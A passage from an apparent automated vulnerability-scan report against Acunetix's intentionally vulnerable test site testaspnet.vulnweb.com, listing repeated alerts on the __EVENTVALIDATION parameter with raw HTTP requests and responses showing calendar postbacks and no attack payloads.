</div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1103 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,103 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8399&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAZsv46doIZGRkR3UqNqE9WTvTfMWzP%2FfxhR5BnRY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKK6qG%2FBQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX75G%2BuK5HF%2B23h9HcWBJasZSbvNA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:03 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAZsv46doIZGRkR3UqNqE9WTvTfMWzP/fxhR5BnRY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKK6qG/BQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gX75G+uK5HF+23h9HcWBJasZSbvNA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:White" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8164&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAU9xOMdoIZGRkB1%2Frx97VZT7xEv6u4mntbLO8aLE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKKof7jBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPWGfizG4M7S8CBYOBi%2B1O%2FSljmUI%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:18 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgBAU9xOMdoIZGRkB1/rx97VZT7xEv6u4mntbLO8aLE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKKof7jBQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPWGfizG4M7S8CBYOBi+1O/SljmUI=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:White" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
